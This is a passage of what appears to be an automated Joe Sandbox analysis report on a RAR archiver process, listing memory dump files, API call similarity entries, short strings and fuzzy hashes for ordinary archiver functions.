                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                              • Instruction ID: 79c62aa1ece9d94ba613c462a6613621c02ac1c9065e001f1363bcdcf82de76c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF0D621A092C142DE249F7199012F82310BB06FF5F1C8334DEBC8B6E7CE9C98849722
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction ID: 48385ddbfb25cc6d905491c92eab42c69c6e0fc90e771baafb93c851d8a1e09b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F0F821ADD24241FE786EA25D6137922965F44FA0F498A35ED2EC63C1EE6CEC418226
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction ID: 4b116ccd01572c761204ee6f78bf3df0802b6b360c8c83ddee050a3d05a361ed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00E04F50F2A30240EDB82E331C5187E02402F5AF81E585439CD1ECA7A2DD1EBC557612
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction ID: 0a3f6891ebdde02d586bb169759022bf9d39fcd0f694f0bbf50979ed4f708fa6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39D05E65EAA90682FF25CF41EC4433012617F14F9BF814638C84C84550CFAC28458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D4549
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction ID: 7353014faf2b3fa6bc2e47802be187974ae897cef2e27eda75226c8549296ad0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32C02B25E0248180DD285B2DCC450341110BF48F76FE00330C13D859F0CF980CFB0302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction ID: 4a936839add6040930e5dc509508c15e6765f6da63f8de85685bb1b1dbf35507
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEF0A432A0964645FF348F64E8403742650EB04F78F685334D63D890E9CFB8DC92D792
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                              • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                              • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                              • Instruction ID: 5c67f78dfdaa1b0465f81fe805e6cc29e405f6ddbd3e383df4daaa908faa4524
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA218132E5864282FFB08F20EC5537A73A1FB85B44F505035E94EC6968DF3DD8498712
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF625718704
                                                                                                                                                                                                                                • Part of subcall function 00007FF625714E3C: GetCurrentProcess.KERNEL32(00007FF625719CC5), ref: 00007FF625714E69
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                              • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                              • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                              • Instruction ID: def0261e6f983c43734b634c0aff1df46f11a644f9d4b699b7606f66d53e1b91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B951D162F64A9585EF20DFA29C205AC67A5FB48FE8B448531DE1D97B85DF3CD8418301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                                              • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                              • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction ID: b89712d8ae7eb83aa0b9c38a4decbaf0313f66ca55c9e46cc28e27841c8a23ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19519122A1968645EE70EF21DC445FE2351BF48F84F650431DD0ECBAAADE7CEA05E302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                              • String ID: rar -ioff
                                                                                                                                                                                                                              • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                              • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                              • Instruction ID: a50389ff9f3b7e970a6ed6c6b00b31f963111cf1779f34f232ff0567a29aac29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99014B64E99A0782FF34DFB0AC546352351BF49F02F540435EC4EC6AB4CE3C6C888662
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                              • Instruction ID: f8598e08543d0e13357f4723899e484daa4577dc78bee8ec21109e4eb2a34696
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3A1F672B4878286FF708FA088643B966D9AF40FA4F588635DA5D867C5DF7CEC449302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1447195878-0
                                                                                                                                                                                                                              • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                              • Instruction ID: df3f8e7ade410ee29522459d3c9160ac857cff35fcc666301ea830df9eacfa33
